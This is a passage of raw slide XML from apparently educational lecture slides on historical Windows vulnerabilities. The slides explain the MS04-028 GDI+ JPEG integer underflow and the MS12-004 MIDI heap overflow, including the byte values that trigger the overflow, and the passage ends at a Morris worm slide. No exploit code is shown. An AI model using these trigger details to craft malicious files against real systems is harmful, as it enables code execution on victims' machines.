            <a:ext cx="4679950" cy="4402138"/>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pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1095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724025"/>
            <a:ext cx="3913188" cy="4657725"/>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pic>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>MS04-028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>GDI+ library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>“provides two-dimensional vector graphics, imaging, and typography. GDI+ improves on Windows Graphics Device Interface (GDI) (the graphics device interface included with earlier versions of Windows) by adding new features and by optimizing existing features” [MSDN]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>GDI+ Jpeg decoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>gdiplus.dll</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>MS04-028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>JPEG format contain multiple headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Problem is in parsing of comment header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Each header segment begins with 2-byte ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Comment header consist of COM marker (0xFFFE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>GDI calculates the length of the comment by taking the length of the fields and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>substrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> 2 bytes (for the ID).</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>MS04-028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>If the length of the field is 0 or 1 the calculation is wrong and the result is negative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>1-2 = -1, i.e. 0xFFFFFFFF, i.e. 4Gb -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>The number is used as 32-bit unsigned integer, i.e. it is interpreted as POSITIVE integer (a big value – 4 billions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>As a consequence the copy operation (copying the comment) copies a large block of data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>That overwrites the Unhandled Exception Filter Pointer</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2103438" y="6113463"/>
            <a:ext cx="67754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dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>http://www.slideshare.net/ashishmalik10/microsoft-gdi-jpeg-integer-underflow-vulnerability</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS12-004: MIDI files</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>MIDI Remote Code Execution Vulnerability - CVE-2012-0003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>“A remote code execution vulnerability exists in Windows Media Player. An attacker could exploit this vulnerability by constructing a specially crafted MIDI file that could allow remote code execution when played using Windows Media Player. An attacker who successfully exploited this vulnerability could take complete control of an affected system.” [MS]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="21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55</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS12-004: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>When an application such as Windows Media Player or Internet Explorer parses a MIDI file, a static heap buffer is allocated (0x400 bytes) but up to 0x440 bytes can be written to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113668" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="6186488"/>
            <a:ext cx="8040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dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS12-004: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146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638" y="1744663"/>
            <a:ext cx="6475412" cy="3232150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114694" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="238125" y="5116513"/>
            <a:ext cx="806132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sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Windows Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mseOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>winmm.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. The second </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer is noted as b1. This specific vulnerability lies in the way certain events from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MTrk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chunk are parsed. These events are first read in "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>smfReadEvents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()", defined in quartz.dll</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114695" name="Oval 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275013" y="4581525"/>
            <a:ext cx="576262" cy="287338"/>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4696" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="6186488"/>
            <a:ext cx="8040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dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS12-004: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>An event is identified by its first byte and noted e1 e2 e3, so that ECX = 0x00e3e2e1. Only events where e1 &lt; 0xF0 are of interest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Windows Media specifically processes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>events, and offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>then computed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>according to e1 and e2 to write data to the buffer b1. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>At the end, EAX = ((e1 &amp; 0Fh) * 2^7 + e2) / 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115716" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="6186488"/>
            <a:ext cx="8040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a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS12-004: More details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>This is where the data in b1 is going to be altered. For particular values of e1 and e2, it is possible to get EAX &gt; 400h. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>For example, e1 = 9Fh =&gt; 0Fh * 2^7 = 780h.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>Then if e2 &gt; 7Fh, e1 + e2 &gt; 800h which makes EAX &gt;= 400h and the program writes past the bounds of the allocated buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Since b1 is 0x400 bytes long, a heap overflow occurs when e1 = 8Fh or 9Fh and when e2 &gt; 7Fh. In practice, it becomes possible to corrupt the 0x40 bytes following b1, which is enough to achieve arbitrary code execution.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116740" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="6186488"/>
            <a:ext cx="8040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200"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php</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59</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Complex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>endmail</a:t>
            </a:r>
            <a:r>
